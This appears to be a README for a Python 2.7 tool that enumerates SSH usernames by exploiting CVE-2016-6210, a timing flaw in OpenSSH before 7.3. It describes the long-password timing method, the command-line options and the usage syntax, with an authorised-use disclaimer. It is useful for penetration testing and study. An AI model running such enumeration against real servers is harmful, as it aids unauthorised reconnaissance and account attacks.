Custom exploit (python 2.7) written for enumerating usernames as per CVE-2016-6210 (OpenSSH 7.2-p2 & prior)
should only be used on authorised systems
I wrote this program as a tool to exploit CVE-2016-6210, which is a vulnerability in OpenSSH (before version 7.3) disclosed by Eddie Harari
From what I understand, the problem is that the way OpenSSH worked in these versions means that when given a large password (in this case 25kb), the hashing processing times mean that we can tell whether a username exists or not, as the amount of time is higher for valid users
This program helps to exploit this vulnerability by allowing the user to send a number of usernames (from a wordlist), and work out how long it took to process them. The user can set an alert for an amount of time that suits them, and the time and username will be displayed if the processing time exceeds this.
The user can also add an ip or email in order to test both the item in the list with and without the email addon at the end. By default, (if not provided an appendage) the program will test each word in the wordlist in the forms word, and word@IP. If provided an appendage, it will do the same, but replacing word@IP with word@appendage.
The amount of times each word is sent and the response is timed can be customised, and the program will automatically generate an average processing time which will then be used instead of individual times, for reliability purposes.
A delay can also be provided, preventing the program from sending too many delays too quickly.
As far as the ssh request code itself, credit goes to Eddie Harari for most of the code in cveCode.py: a modified version of Harari's code is used for sending and
calculating the timings. His advisory and sample code can be found here
Note: My code has only been black-box tested on OpenSSH-7.2p2 (client is kali linux), and needs further testing. The results and parameters are controlled and interpreted by the user
python exploit_6210.py IP_ADDRESS [-h] [-a ALERT] [-w WORDLIST] [-e EMAIL] [-av ITERATE_AMOUNT] [-d DELAY]
Where:
-
IP_ADDRESS is the host that you are testing the program against
-
-a ALERT (optional, default is 0.1) is the amount of time (in seconds) for which you would like an alert to be made if the processing time is larger
-
-w WORDLIST (optional, default is usernamelist) is the filepath for the list of usernames you would like to test against the host
-
-e EMAIL (optional) is the ip or email (which should look like: @IP_ADDRESS or @email.com) appendage you would like to try on the end of each element in the wordlist (note that both the item AND the item + email will be tried)
-
-av ITERATE_AMOUNT (optional, default is 1) is the amount of times to query the ssh server for each given username, which allows more reliable averages for timings to be used (the higher the number, the longer it will take, by a LOT)
-
-d DELAY (optional, default is 0.5) is the approximate delay (in seconds) between each request (the higher the number, the longer it will take, by A LOT)